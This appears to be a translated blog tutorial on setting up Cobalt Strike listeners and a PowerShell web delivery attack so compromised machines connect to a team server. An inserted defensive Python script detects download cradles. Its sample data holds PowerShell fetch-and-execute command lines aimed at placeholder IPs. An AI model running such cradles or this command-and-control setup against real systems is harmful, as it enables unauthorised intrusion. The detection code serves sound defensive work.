Introduction to using Cobalt Strike: listeners

While looking through material online, I found that the latest Cobalt Strike teaching videos have been released on Bilibili (B station). They cover the basics and are good to learn from. They are from Hetian.com. PS: the voice of the young lady in the video is very sweet.

If some information cannot be found on the Internet, go to the official website and read the documentation; you may gain something from it -- Portal

Overview

The first step in any engagement is to set up the infrastructure. In the case of Cobalt Strike, the infrastructure consists of one or more team servers, redirectors, and DNS records pointing to your team servers and redirectors. Once your team server is up and running, you will need to connect to it and configure it to accept connections from infected systems. Listeners are the mechanism by which Cobalt Strike does this.

A listener is both a payload's configuration information and Cobalt Strike's instructions for setting up a server to accept connections from that payload. A listener consists of a user-defined name, the type of payload, and several payload-specific options.

When you open the client, many of the operations that follow involve the listener, for example generating a Trojan. The payload generated by CS needs to be transmitted to the target server, and the server connects with the payload. The server needs to start a listener first, so that the payload can find the server. ---- Mountains and rivers

Open a listener

Name: any name you like

Payload: there are different types; generally select one of the first three

HTTP address: the server address; the field below it (stager) takes the same value

HTTP port: the listening port

⚠️ Note: a pitfall encountered here is that the listener cannot be created when the web address already exists. In that case, just change the port.

⚠️ The server's security group and firewall must also be set up: close the firewall or open the corresponding port, and set the security group as well, otherwise the connection cannot be established.

The server interacts with the target machine.

Set up a web delivery attack

Local port: can be customized

Listener: select the one you just set up

Type: powershell

After clicking Run, the following figure will be generated. Copy it to the window and run it.

If you get this far but there is no response after entering it, check the security group and firewall of the server to see if there is a problem.

 

At this time, the target machine's connection will be displayed.
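From the defender's side, the PowerShell-type web delivery step above shows up on the target as a process command line that fetches remote content and runs it in memory. The following is an added example, not code from the original post or from Cobalt Strike: it triages process-creation records for that pattern and pulls out the URL so the staging host and port can be blocked. The record fields, host names and addresses are constructed for illustration, and the indicator patterns are assumptions about a typical download-and-execute one-liner.

```python
import re

# Constructed process-creation records (the kind of command line captured by
# Sysmon Event ID 1 or Security 4688). Addresses are documentation ranges.
SAMPLE_EVENTS = [
    {"host": "WS01", "cmdline": "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.0.2.10:8080/a'))\""},
    {"host": "WS02", "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"},
    {"host": "WS03", "cmdline": "PowerShell -NoProfile -WindowStyle Hidden -Command \"Invoke-Expression (Invoke-WebRequest http://198.51.100.7/x).Content\""},
    {"host": "WS04", "cmdline": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users"},
]

# Assumed indicators: remote fetch, in-memory execution, and the two switches
# that hide the window and skip the user profile (PowerShell accepts prefixes).
INDICATORS = {
    "fetch": re.compile(r"downloadstring|downloaddata|invoke-webrequest|net\.webclient", re.I),
    "exec": re.compile(r"\biex\b|invoke-expression", re.I),
    "hidden_window": re.compile(r"\s-w\w*\s+hidden", re.I),
    "no_profile": re.compile(r"\s-nop\w*", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


def triage(events):
    """Return PowerShell events that both fetch remote content and execute it."""
    hits = []
    for ev in events:
        cmd = ev["cmdline"]
        if "powershell" not in cmd.lower():
            continue
        found = sorted(name for name, rx in INDICATORS.items() if rx.search(cmd))
        # Fetch plus exec together is the download cradle; the switches alone
        # are common in legitimate administration and are only context.
        if "fetch" in found and "exec" in found:
            hits.append({"host": ev["host"], "indicators": found,
                         "urls": URL_RE.findall(cmd)})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["host"], hit["indicators"], hit["urls"])
```

The extracted URLs give the host and port to check against egress logs and to block at the proxy or firewall.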

 

Operations such as privilege escalation can be performed. 

 

=======Splitting line

Theoretical knowledge

 

 

 


Origin blog.csdn.net/y995zq/article/details/124386346